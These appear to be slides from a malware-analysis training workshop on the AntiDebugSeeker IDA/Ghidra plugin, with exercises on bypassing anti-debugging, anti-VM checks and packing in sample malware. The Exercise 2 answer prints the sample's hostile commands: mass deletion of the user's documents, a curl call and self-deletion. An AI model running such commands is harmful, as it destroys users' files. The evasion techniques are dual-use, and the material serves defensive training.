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Speaker Experience:
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Request for Today's Workshop

検体は最初の演習1以外は、マルウェアです。

演習で使用する4つの検体すべて、実行は、必ずVM環境（外部に影響を及ぼさないように
構築された安全な環境）で行ってください。

万が一、ホスト側で実行してしまっても、責任は一切負えません。

自己責任でお願いいたします。

また、すべてのサンプルはVTなどのオンラインサンドボックスにあげないでください。

All samples used in the exercises, except for the first exercise, are malware.

Please make sure to run all four samples used in the exercises in a VM 
environment (a safe environment constructed not to affect the outside). We 
cannot take any responsibility if you accidentally run it on the host side. 

Please proceed at your own risk.

Do not upload any of the samples to online sandboxes such as Virus Total.
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Time LEVEL&TITLE

10:00 – 10:15 Introduction
Confirm the description of AntiDebugSeeker and how to use it with IDA and Ghidra

10:15 – 10:45 
(Exercise Time)

Level1. Analysis of a program with multiple anti-debugging features 

11:10 – 11:40 
(Exercise Time)

Level2. Analysis of a program with multiple anti-debugging features 

13:20 – 14:00 
(Exercise Time)

Level3. Analysis of a program with multiple anti-debugging features 

14:30 – 15:00 
(Exercise Time)

Level4. Malware Analysis Tips + Anti Debug 

Timetable Plan1 ※ The schedule is subject to change.
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Time LEVEL&TITLE

10:00 – 10:15 Introduction
Confirm the description of AntiDebugSeeker and how to use it with IDA and Ghidra

10:15 – 10:45 
(Exercise Time)

Level1. Analysis of a program with multiple anti-debugging features 

11:10 – 11:40 
(Exercise Time)

Level2. Analysis of a program with multiple anti-debugging features 

13:20 – 14:40
(Exercise Time)

Level3. Analysis of a program with multiple anti-debugging features 

14:00 – 14:40
(Exercise Time)

Optional Exercise : Level4. Malware Analysis Tips + Anti Debug 

Timetable Plan2 ※ The schedule is subject to change.



Confirm the description of AntiDebugSeeker and 
how to use it with IDA and Ghidra
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What is AntiDebugSeeker
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This is a program for automatically identify and extract potential anti-
debugging techniques used by malware and displaying them in IDA /
Ghidra.

The main functionalities of this plugin are as follows:

1.Extraction of APIs that are potentially being used for anti-debugging 
by the malware.

2.Using multiple keywords, anti-debugging techniques are extracted.

※For packed samples, running this plugin after unpacking and fixing 
the Import Address Table is more effective.



The motivation behind developing this tool 
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Demo: IDA version of AntiDebugSeeker
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DEMO

Malware : Ursnif

MD5 : 4da11c829f8fea1b690f317837af8387 (Packed)

MD5 : 952d604345e051fce76729ccb63bde82 (Unpack)

The flow of a demo

①A type of anti-analysis leads to the termination of the process.

②Using AntiDebugSeeker to find anti-analysis features.

③Apply patches using a debugger. 
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The Analysis result of IDA-AntiDebugSeeker
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It also informs us about aspects related to 
malware functions, such as memory 

manipulation.

It was determined that the function 
sub_401000 has 

anti-debugging features.
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Comment Function
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Extra Function - Edit Config File -



Introduction to configuration files
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Files Required to Run the Program
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Please place the following three files under the plugin directory of IDA :

1.anti_debug.config (A file containing rules for detecting anti-debugging techniques)
2.anti_debug_techniques_descriptions.json (A file containing descriptions of the detected rules)
3.AntiDebugSeeker.py (The anti-debugging detection program)



anti_debug.config
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Anti_Debug_API In the Anti_Debug_API section, you can freely create 
categories and add any number of APIs you want to detect. 
(exact match)

###Anti_Debug_API###
[Category Name_1]
API1
API2
API3

[Category Name_2]
API4
API5
API6



anti_debug.config
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Anti_Debug_Technique

###Anti_Debug_Technique###

default_search_range=80

[Rule1]

ABC

DEF

GHI

search_range=200

80bytes

80bytes

You can set up to three keywords (partial match) under a 
single rule name.

Search Target:

Disassembly (Opcode, Operand)

Comments

API based on Import Table



anti_debug_techniques_descriptions.json

© 2025 LAC Co., Ltd. 20



© 2025 LAC Co., Ltd. 21

HeapTailMarker
KernelDebuggerMarker
DbgBreakPoint_RET
DbgUiRemoteBreakin_Debugger_Terminate
PMCCheck_RDPMC
TimingCheck_RDTSC
SkipPrefixes_INT1
INT2D_interrupt_check
INT3_interrupt_check
EXCEPTION_BREAKPOINT
ICE_interrupt_check
DBG_PRINTEXCEPTION_C
TrapFlag_SingleStepException
BeingDebugged_check
NtGlobalFlag_check
NtGlobalFlag_check_2
HeapFlags
HeapForceFlags
Combination_of_HEAP_Flags
Combination_of_HEAP_Flags_2

ReadHeapFlags
ReadHeapFlags_2
DebugPrivileges_Check
Opened_Exclusively_Check
EXCEPTION_INVALID_HANDLE_1
EXCEPTION_INVALID_HANDLE_2
Memory_EXECUTE_READWRITE_1
Memory_EXECUTE_READWRITE_2
Memory_Region_Tracking
Check_BreakPoint_Memory_1
Check_BreakPoint_Memory_2
Software_Breakpoints_Check
Hardware_Breakpoints_Check
Enumerate_Running_Processes
ThreadHideFromDebugger
NtQueryInformationProcess_PDPort
NtQueryInformationProcess_PDFlags
NtQueryInformationProcess_PDObjectHandle
NtQuerySystemInformation_KD_Check

The following Anti Debug Techniques can be detected using AntiDebugSeeker.

List of detectable anti-debugging techniques (Ver1.0)

VM_Check
VBox_Check
VMware_Check
VMware_I/O_port
VMware_magic_value
CreateMutex_AlreadyExist
CreateEvent_AlreadyExist
ChildProcess_Check
Extract_Resource_Section
Commucate_function_String
Commucate_function
NtSetInformationThread
NtQueryInformationProcess
Anti-Sandbox_SandBoxie
Anti-Sandbox_Buster_Sandbox_Analyzer



Demo:
Ghidra version of AntiDebugSeeker
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DEMO
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Malware : Qakbot (aka. Qbot)

MD5 : bce0df8721504d50f4497c0a0a2c090d (Packed)

MD5 : 58e1c32eeb0130da19625e55ee48cf1e (Unpack)

The flow of a demo

①A type of anti-analysis leads to the termination of the process.

②Using AntiDebugSeeker to find anti-analysis features.

③Examine the behavior of AntiDebug, and identify the areas to patch from the 

AntiDebugSeeker results + Apply the patch using a debugger. 
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The Analysis result of Ghidra-AntiDebugSeeker

Only Return

Anti Debug Function Detected / No Detected

FUN_4033fc Detected ( VM presence )

FUN_40349a Detected ( VM presence )

FUN_4035b6 Detected ( Check Hardware )

FUN_40385e Detected ( File Operation )

FUN_403bdf No Detected

FUN_403d22 No Detected

FUN_40336e Detected ( Environment_TimingCheck )



Introduction to Files related to the 
Ghidra version
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Files Required to Run the Program

⚫Ghidra Script

AntiDebugSeeker.java

⚫Ghidra Extension

Ghidra_11.0.1_PUBLIC_AntiDebugSeeker.zip

 Configuration Files

anti_debug_Ghidra.config

anti_debug_techniques_descriptions_Ghidra.json
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AntiDebugSeeker VS .Net Base Malware
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Malware : Thanos Ransomware

MD5 : e01e11dca5e8b08fc8231b1cb6e2048c 

Anti Debug

AntiDebugSeeker VS .Net Base Malware



AntiDebugSeeker VS .Net Base Malware
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AntiDebugSeeker VS .Net Base Malware
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Exercise 1

Level1. 
Analysis of a program with multiple anti-debugging 

features 
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Exercise 1

Target Malware : Custom_AntiDebug.exe

Question. 

• Check the anti-analysis features implemented in this program.

• Verify the messages displayed for each anti-analysis feature.

Optional Question.

• The message is obfuscated with XOR,

Please investigate the decryption key.

Point 1: Use the IDA/Ghidra plugin AntiDebugSeeker to identify 

anti-analysis features. 

Point 2: Analyze the program using both static analysis tools (IDA/Ghidra) and 
dynamic analysis tools (debuggers).
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Hint : Main function at 00401230



Exercise1 Answer for Ghidra
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Exercise 1 Answer For Ghidra
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⚫ Use AntiDebugSeeker to confirm the anti-analysis features.



Exercise 1 Answer For Ghidra

© 2025 LAC Co., Ltd. 38

⚫ Use AntiDebugSeeker to confirm the anti-analysis features.

Grouping detection results by 
function makes the detection 

results easier to analyze in Ghidra.

How many anti-debugging 
techniques are there?



Exercise 1 Answer For Ghidra
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⚫ You can also check the detection results from Bookmarks in Ghidra.
⚫ When conducting analysis, it is recommended to navigate to the desired address via Bookmarks.



Exercise 1 Answer For Ghidra
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⚫ The first is AntiDebug using IsDebuggerPresent.
⚫ What is the message displayed?



Exercise 1 Answer For Ghidra
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What does a return value 
of 1 mean?



Exercise 1 Answer For Ghidra
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⚫ If you proceed with F8 without applying any patches, it hits Call Sub_401170.
⚫ First message is displayed.
⚫ Be cautious of conditional jumps like je.



Exercise 1 Answer For Ghidra
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Pressing this will restart the debugging 
process from the beginning.



Exercise 1 Answer For Ghidra
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• To force the jump, change the ZF flag to 1.
• Double-click the area where ZF is set to 0.



Exercise 1 Answer For Ghidra
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⚫ It changes to jump to 4018F4, allowing you to observe the subsequent behavior.



Exercise 1 Answer For Ghidra
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⚫ Is sub_401000 an anti-debugging function?



Exercise 1 Answer For Ghidra

© 2025 LAC Co., Ltd. 47

It can be confirmed from the results of 
AntiDebugSeeker that VM detection is being performed.



Exercise 1 Answer For Ghidra
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⚫ Use F7 to step into sub_401000 and analyze it.



Exercise 1 Answer For Ghidra
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The code checking whether it is a VM environment.



Exercise 1 Answer For Ghidra
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⚫ If a VM is detected and you proceed with F8 without applying a 
patch, a message will be displayed.

⚫ Three more anti-debugging left



Exercise 1 Answer For Ghidra
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Pressing this will restart the debugging 
process from the beginning.



Exercise 1 Answer For Ghidra
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⚫ Setting the ZF flag to 1 also works.
⚫ As an alternative, use the space key to change je to jmp, forcing the jump.



Exercise 1 Answer For Ghidra
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⚫ It has been forcibly changed to jmp to 401908.



Exercise 1 Answer For Ghidra
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Check the comments to determine what 
it is attempting to detect.



Exercise 1 Answer For Ghidra
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⚫ It is checking for the x32dbg and x64dbg processes.



Exercise 1 Answer For Ghidra

© 2025 LAC Co., Ltd. 56

⚫ It is checking for the x32dbg and x64dbg processes.



Exercise 1 Answer For Ghidra
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⚫ It was a program that detects x32dbg and x64dbg, but are there any other 
tools that might also be targeted for detection?



Exercise 1 Answer For Ghidra
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After detection in x32dbg, the program attempts to 
terminate the process and jump to a function that 

outputs a message. To bypass this, modify the ZF flag or 
similar conditions to prevent the jump.



Exercise 1 Answer For Ghidra
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Check all processes and either terminate the loop or modify the conditional 
branch at 401977 to bypass it. Both approaches work.



Exercise 1 Answer For Ghidra
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Check the comments to determine what it is 
attempting to detect.



Exercise 1 Answer For Ghidra
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Exercise 1 Answer For Ghidra
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Exercise 1 Answer For Ghidra
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⚫ 0040198A mov eax,dword ptr fs:[30] //PEB Access
⚫ 00401990 mov eax,dword ptr ds:[eax+68] //NtGlobal Flag
⚫ 0401993 and eax,70 //Compare NtGlobal Flag 70 or not

⚫ If the value of NtGlobalFlag is 70, it is considered as a sign of debugging.



Exercise 1 Answer For Ghidra
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⚫ This is the final anti-debugging mechanism.
⚫What does the comment say?



Exercise 1 Answer For Ghidra
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⚫ You can either change the ZF flag, modify the jump instruction.



Exercise 1 Answer For Ghidra
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⚫ When call edi is executed, the thread becomes invisible to the debugger, making it 
impossible to continue debugging.



Exercise 1 Answer For Ghidra
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To display the message, modify the conditional branch at 4019CB. 
This can be done by changing the jump instruction (e.g., je to jmp) or adjusting the flag 
condition to ensure the desired path is taken.



Exercise 1 Answer For Ghidra
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⚫ The final message is displayed.



Exercise 1 Optional Question Answer For Ghidra

© 2025 LAC Co., Ltd. 69

⚫ To investigate the XOR key, examine the function that outputs the message.



Exercise 1 Optional Question Answer For Ghidra
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sub_401090
XOR_KEY = jsac2025



Exercise 2

Level2. 
Analysis of a program with multiple anti-debugging 

features 
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Exercise 2

Target Malware : Exercise2.exe

Question

Use dynamic and static analysis to apply patches and make the malware 
function properly.

Check1 : How many anti-analysis features must be circumvented?

Check2 : Investigate the main functions of this malware.

Point : Use the IDA/Ghidra plugin AntiDebugSeeker to identify 

anti-analysis features. 
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Exercise 2 Answer for Ghidra
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Exercise 2 Answer For Ghidra
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⚫ Use AntiDebugSeeker to confirm the anti-analysis features.

Click ‘Detected Function List’ Button 
to group the function list 



Exercise 2 Answer For Ghidra
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⚫ Use AntiDebugSeeker to confirm the anti-analysis features.

75

How many anti-debugging 
features are there?



Exercise 2 Answer For Ghidra
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⚫ The first is AntiDebug using Sleep-Time Check.

It's easier to visualize when 
hexadecimal is converted to decimal.
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Exercise 2 Answer For IDA

Decompiled

1. Get Initial Time (α): It first captures the current time.
2. Sleep for 16 Seconds: The program then pauses for 16 seconds.
3. Get Time After Sleep (β): Immediately after the pause, it captures the time again.
4. Calculate Time Difference: The difference between the initial time (α) and the time after sleep (β) is 

calculated.
5. Check for Time Discrepancy: If the difference is less than 15 seconds, the program assumes that some 

form of anti-debugging technique, like sleep time reduction in a sandbox, is being used.
6. Terminate if Tampered: If it detects shortened sleep, suggesting tampering or debugging, the malware 

shuts itself down to avoid detection or analysis.



Exercise 2 Answer For Ghidra
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⚫ The first is AntiDebug using Sleep-Time Check.
⚫ The purpose is to detect environments like sandboxes, so it can be debugged directly 

using F8.



Exercise 2 Answer For Ghidra
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If you continue debugging as is, there is a function called sub_4010D0. 
Does this function have anti-analysis capabilities?

Check the comments to determine 
what it is attempting to detect.



Exercise 2 Answer For Ghidra
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The function is checking whether any 
process of an analysis tool is running.



Exercise 2 Answer For Ghidra
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It modifies the ZF (zero flag) to 
prevent jumping.
(example answer)

It goes to the end of 
the process.



Exercise 2 Answer For Ghidra
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⚫ This modification bypasses the process check for analysis tools.



Exercise 2 Answer For Ghidra
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⚫ As the comments indicate, EnumWindows is an API that checks the names of open windows.
⚫ It identifies which windows are being checked.



Exercise 2 Answer For Ghidra

© 2025 LAC Co., Ltd. 84

If there is no target window to detect, 
the return value will be 0.



Exercise 2 Answer For Ghidra
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⚫ Is it an anti-debugging technique like the comment suggests, or is it something else?
⚫ What does ¥¥.¥Global¥ProcmonDebugLogger mean?

By checking for the existence of ¥¥.¥Global¥ProcmonDebugLogger, it 
can determine whether a monitoring tool like Procmon is running.



Exercise 2 Answer For Ghidra
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⚫ If Process Monitor is not running, it can pass through without altering the jump instruction.

⚫ Next, Debugging detection using IsDebuggerPresent API



Exercise 2 Answer For Ghidra
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⚫ Since debugging is active, the return value is also 1.
⚫ JNE (Jump Not Equal) = 0, so the jump is taken.

At 4016DD, press the space key to modify JNE (Jump Not Equal) to JE (Jump Equal).
Alternatively, you can also manipulate the ZF (Zero Flag) to achieve the desired outcome.



Exercise 2 Answer For Ghidra
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It went undetected by 
AntiDebugSeeker.

Why was it not 
detected?



Exercise 2 Answer For Ghidra
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4016E3 call edi

⚫ 73E25D07 | mov ebx,dword ptr ds:[7FFE0004]
7FFE0004 : It refers to the TickCountLow field in KUSER_SHARED_DATA.

⚫ A loop containing the pause instruction can detect debugging 
environments by taking advantage of subtle timing differences.



Exercise 2 Answer For Ghidra
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ja is a conditional branching 
instruction in assembly language, 

meaning "Jump if Above." 

The condition is CF = 0 and ZF = 
0 (no carry and non-zero), so you 
can avoid the jump by changing 

either of these flags.

While debugging, the count exceeds 
1194h, causing a jump to 4019A0.



Exercise 2 Answer For Ghidra
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⚫ Checking the value of NtGlobalFlag is a method used to determine the presence of debugging.



Exercise 2 Answer For Ghidra
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⚫ The value 70, indicating debugging, is stored in EAX as the return value, 
and a cmp instruction is used to check whether it is 70.

Change the branch by modifying the 
flag or applying a patch.



Exercise 2 Answer For Ghidra
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⚫ The program uses CheckRemoteDebuggerPresent to check whether it is running in a debugging environment.
⚫ It can be modified by replacing the jne instruction with nop or je, or by applying a patch.



Exercise 2 Answer For Ghidra
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⚫ When debugging with F8, there is a function being called at address 401784, 401791. 
⚫ What does this function do?



Exercise 2 Answer For Ghidra
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⚫ mov eax, 0x564D5868: This instruction moves the hexadecimal value 0x564D5868 into the eax register. This value 
is known as the "VMware magic value" and is used for communication with the VMware hypervisor.

⚫ in eax, dx: This instruction reads from the I/O port specified in edx (the VMware port) into eax. The result of this 
operation can help determine whether the environment is a VMware VM.

⚫ If the in instruction successfully reads from the VMware I/O port and the value matches the expected VMware 
magic value, the program can conclude that it is running within a VMware environment.



Exercise 2 Answer For Ghidra
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For the jump statements at addresses 40178B and 401798, 
there are approaches to circumvent them:

• Apply a patch (e.g., use nop).
• Modify the flags.



Exercise 2 Answer For Ghidra

Check. How many anti-analysis features must be circumvented?

Answer： There are nine anti-analysis features implemented.
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✓ Sleep time check
✓ Enumerate Running Process
✓Check Analysis tool by EnumWindow
✓Check running Process Monitor
✓ IsDebuggerPresent API
✓ Timing Check KUSER_SHARED_DATA
✓Check NtGlobalFlag
✓CheckRemoteDebuggerPresent API
✓VM Check



Exercise 2 Answer For Ghidra
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⚫ Delete a document file using the system command.



Exercise 2 Answer For Ghidra
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Executing curl using the system command.



Exercise 2 Answer For Ghidra
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⚫ Delete itself.



Exercise 2 Answer For Ghidra
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"del /S /Q *.doc c:¥¥users¥¥%username%¥¥ > nul“
"del /S /Q *.docm c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.docx c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.dot c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.dotm c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.dotx c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.pdf c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.csv c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.xls c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.xlsx c:¥¥users¥¥%username%¥¥ > nul“

"curl -s -e https://www[.]xvideos[.]com -A ¥"Mozilla / 5.0 (Windows NT 10.0; 
Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0¥" 
https://www[.]xvideos[.]com/video64080443/_ > nul"

"cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 
¥"C:¥¥Users¥¥Win10¥¥Desktop¥¥Exercise2.exe¥""

The main functions of this malware are as follows:

⚫ Deletion of document files
⚫ Generating network communications by executing the curl command
⚫ Deleting itself

"del /S /Q *.xlsm c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.ppt c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.pptx c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.pptm c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.jtdc c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.jttc c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.jtd c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.jtt c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.txt c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.exe c:¥¥users¥¥%username%¥¥ > nul"
"del /S /Q *.log c:¥¥users¥¥%username%¥¥ > nul"



Exercise 3

Level3. 
Analysis of a program with multiple anti-debugging 

features 
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Exercise 3

Target Malware : Exercise3.exe

Question

Use dynamic and static analysis to apply patches and make the malware 
function properly.

Point 1: First, execute it and observe its behavior, especially the processes.

Point 2: Use the IDA/Ghidra plugin AntiDebugSeeker to identify 

anti-analysis features. 

Refer to the results from Point 1 and proceed with static analysis and 
dynamic analysis, including debugging.
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Exercise 3 Answer for Ghidra
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Exercise 3 Answer For Ghidra

When you try executing it …
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A subprocess emerges with the parameter /C attached. This needs to be 
analyzed to understand what it signifies during the analysis process.



Exercise 3 Answer For Ghidra

⚫ Use AntiDebugSeeker to confirm the anti-analysis features.
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Click the 'Detected Function List' button 
to group the analysis results by function.



Exercise 3 Answer For Ghidra

⚫ The analysis results are also recorded in Bookmarks, so make sure to check them.
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Exercise 3 Answer For Ghidra

⚫ When checking, pay particular attention to anything detected under the 
AntiDebugTechnique category (identified by multiple keywords) and thoroughly review it.
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Exercise 3 Answer For Ghidra

⚫ Let's take a look at one of the detections made by AntiDebugSeeker.

⚫ Rule Name : VMware I/O port.
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Check the comments in the rules to 
understand what kind of anti-analysis 

features have been detected.



Exercise 3 Answer For Ghidra

 Here's a summary of what we've learned so far:

✓ When executed, it operates by initiating a subprocess with the /C parameter.

✓ According to the results from AntiDebugSeeker, there appear to be several 
anti-analysis features.
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What kind of API is 
CommandLineArgvW?

⚫ Check the behavior of the /C 
parameter with static analysis. 

⚫What happens when /C is specified?
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Exercise 3 Answer For Ghidra

• When the /C condition is met, it can be 
understood from this code that it proceeds 
to the process FUN_00403ef7.

• What kind of processing does FUN_00403ef7 
involve?

Decompiled
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FUN_00403ef7

• It's clear that there are multiple 
conditional branches. 

• For example, What kind of processing 
does FUN_004033fc involve?

Decompiled
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It is clear that all functions within the 
red frame are related to anti-analysis 

features.

It is clear that all functions within the 
red frame are related to anti-analysis 

features.
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File > Modify Command Line

• Execute with the /C parameter attached, using a debugger.
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• Try debugging the section at FUN_004033fc.
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Set a breakpoint and execute.
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• Check the section where it verifies the VM.
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• Try debugging and investigating what kind of anti-analysis features 
are present.
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Anti Debug Function Anti Debug Type

FUN_4033fc VM presence

FUN_40349a VM presence

FUN_4035b6 Check Hardware

FUN_40385e File Operation

FUN_403bdf Check Sandbox

FUN_403d22 File Name Check

FUN_40336e Environment_TimingCheck
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• Regarding where to apply the patch.
• Find the section where it processes the subprocess /C.

v

v Detected Function list
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• How to apply the patch

Pay attention to the return value of GetExitCodeProcess. 
If the value of EAX is not zero, it detects that it is in an 

analysis environment. 
Therefore, add 'mov eax, 0' just before the 'xor eax, eax' 

section.



Exercise 3 Answer For Ghidra

© 2025 LAC Co., Ltd. 123

• At address 404F86, press the space key and enter 'mov eax, 0'.
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File > Choose to Patch File > Select 'Patch File' > Save
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Execute the patched file and record the network 
traffic using Wireshark or similar tools.



Exercise 4

Level4. 
Malware analysis Tips + Anti Debug
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Exercise 4

Target Malware : Packed_Exercise4.exe

Question1.

This sample is packed. 

Please set breakpoints on the following two APIs using a debugger, and 
attempt to unpack:

✓ VirtualAlloc

✓ VirtualProtect
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Question1 Answer for Ghidra
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When looking at the area highlighted in red, 
it suggests that the code may have been 
packed or obfuscated. Additionally, the 

results from the Detect it Easy tool show that 
you can observe the Entropy, and it is 

identified as 97% Packed.
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set breakpoints on the 
following two APIs

VirtuaAlloc
VirtualProtect
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When setting breakpoints on VirtualAlloc and VirtualProtect and running the 
process multiple times, the string ".text" becomes visible, prompting a memory 

dump to be performed.

Right-click and select "Memory Map".
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What does the VirtualProtect API 
do, and which memory address 

does it operate on?

The "MZ" signature is 
visible, which is the magic 

number for an EXE file. 
Since the unpacked EXE is 
loaded into memory, it will 

be dumped.
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Extract memory from 
this location.

Right-click, Dump to Memory to File



Exercise4 Answer Question1 Add Explanation

1. Allocate a memory region.
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VirtualAlloc

Follow in Dump

5A0000



Exercise4 Answer Question1 Add Explanation

2. Decrypt the shellcode and copy it into the allocated memory region.
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Decrypt Shellcode
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⚫ Extract Shellcode
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3.Execute the shellcode to decrypt the executable.
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Decryption Process

Decrypt the executable

※ Refer to Reference_Extract_Shellcode Folder
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VirtualProtect
Change the original executable to 

PAGE_READWRITE.

Overwrite Executable
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Jump to the decrypted 
executable.



Exercise 4

Target Malware : Exercise4.exe (Unpacked Exercise4.exe)

Question2.

This program is enabled with ASLR (Address Space Layout Randomization). 

As a result, the memory addresses displayed in IDA or Ghidra may differ 
from those shown in the debugger. 

To facilitate easier debugging, in IDA, use the "Rebase Program" option, 
and in Ghidra, adjust the "Base Image Address" so that the memory 
addresses in IDA and Ghidra match those in the debugger.
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Question2 Answer For Ghidra
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When opened in IDA and a debugger, the memory addresses differ, 
making analysis difficult (though some people may not mind). 

Try changing the memory address on the IDA side.
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Window > Memory Map > House mark Button > Set Base Image Address

Memory Map

Input 00BA0000

※An error will be displayed for the 
sections that could not be set 

successfully, but they are registered 
as Bookmarks. Please review and fix 

the error locations as needed.
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Ensure that the addresses are the same.



Exercise 4

Target Malware : Exercise4.exe

Question3.

This diagram shows a part of malware that has been unpacked using 
IDA/Ghidra. It is creating a thread using CreateThread. 

How should I debug the thread that has been created?
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Question3 Answer For Ghidra
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CreateThread is a function that creates a new thread. In this case, it sets the 
function labeled as lpStartAddress as the starting point for the execution of the 
new thread.
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Since this is the starting position of the thread, 
set a breakpoint at this memory address.

The address value of lpStartAddress_ 
remains the same as before changing the 

Base Image, but when checking the 
destination, the updated address 

00BB3CF8 is the correct value.
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Ctrl + G > input 00BB3cf8



Exercise4 Answer Question3
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Set Breakpoints + F9

Before executing the thread, press F9.

After executing the thread, 
press F9.

New thread are created



Exercise 4

Target Malware : Exercise4.exe（Unpacked Version)

Question4.

Find the MAC address related to VMware from the values written in 
hexadecimal, edit the rule file, and make it detectable by AntiDebugSeeker.
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Question4 Answer For Ghidra
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The three hexadecimal values are related to 
VMware's MAC address, and are being used 

to check if the analysis environment is a 
virtual machine.
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Define the three values in the anti_debug_Ghidra.config

Be aware that the hexadecimal notation differs 
between IDA and Ghidra. In the case of Ghidra, 

you need to prepend 0x to the value.
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Edit anti_debug_techniques_descriptions_Ghidra.json.

An important point to note is that the rule names 
listed in this file must match those in the 

anti_debug_Ghidra.config. If they do not match, it 
will not be possible to verify the details of the rules.
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Exercise 4

Target Malware : Exercise4.exe（Unpacked Version)

Question5.

What is this code doing, 

and how can the results of its execution be debugged?
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Question5 Answer For Ghidra
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The arguments specify the address and 
the size of the data to be decrypted.

160

An XOR operation is being 
attempted with the initial value of 

v13 = 0x22.

This process is carried out in a loop.

V13(Key) Update
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It is understood that the memory at ebp-1 (22) is XORed 
with the data to be decrypted, al = 4F ('O').

⚫ Behavior of a Function That Decrypts Using XOR
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The result of the XOR operation is stored at the memory address [ebp + ebx – 414].
Therefore, the decrypted result is unpacked at this memory address.
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Before Decryption After Decryption
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XOR

Before Decryption After Decryption

It is also possible to decrypt the data extracted from memory using a program like Python.
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import sys
import os

def decrypt(config):
    counter = 0
    key = 0x22
    idiv_val = 0x85
    imul_val = 3
    decrypted = []

    # Process binary data
    for i in config:
        dec_val = i ^ key
        decrypted.append(chr(dec_val))
        add_to_key = counter % idiv_val
        imul_val = 3
        add_to_key = imul_val * add_to_key
        key += add_to_key
        key = key & 0xff
        counter += 1

    # Return decrypted result
    return "".join(decrypted)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <binary_file> [output_file]")
        sys.exit(1)

    file_path = sys.argv[1]
    output_file = sys.argv[2] if len(sys.argv) >= 3 else "output.bin"

    if not os.path.isfile(file_path):
        print("Error: File not found.")
        sys.exit(1)

    try:
        # Open the binary file safely in read-only binary mode
        with open(file_path, "rb") as f:
            config = f.read()

        # Decrypt data
        result = decrypt(config)

        # Save result to file
        with open(output_file, "w", encoding="utf-8") as f:
            f.write(result)

        print("Decrypted result:")
        print(result)
        print(f"¥nResult saved to: {output_file}")

    except Exception as e:
        print(f"Error: {e}")

Python code to decrypt the 
previously encrypted data
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Edit anti_debug_techniques_descriptions.json.

An important point to note is that the rule names 
listed in this file must match those in the 

anti_debug.config. If they do not match, it will not 
be possible to verify the details of the rules.



Appendix

An Introduction to the Basic Usage of Ghidra and x32/64dbg
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How to Use Ghidra
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⚫ Display Project Window



How to Use Ghidra
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⚫ Make Project
File > New Project
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⚫ Select Project
> Non-Shared Project



How to Use Ghidra
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⚫ Select a Directory which you want to save
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⚫ Double Click the display program name.
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⚫ Select Analyze Option



How to Use Ghidra
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⚫ Code Browser

Listing Window
Decompile

Window

Console Window

Program
Trees

Symbol Tree

Data Type 
Manager
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Disassemble

Tables in general

Register

StackHex Dump

Stack data during a 
specific function call

Input Command, such as bp VirtualAlloc
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Restart : Ctrl + F2

Execution : F9

step into : F7

step over : F8

Execute till Return : Ctrl + F9

Execute till user code : Alt + F9

Display Strings



How to Use x32/64 dbg
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This memory map displays the memory regions 
currently used by the process. The main details are 
as follows:

• Address Range: The starting position and size of 
the memory.

• Purpose: The usage of the memory, such as 
stack, heap, code section (.text), or data section 
(.data).

• Protection: Access permissions such as Read (R), 
Write (W), and Execute (X).
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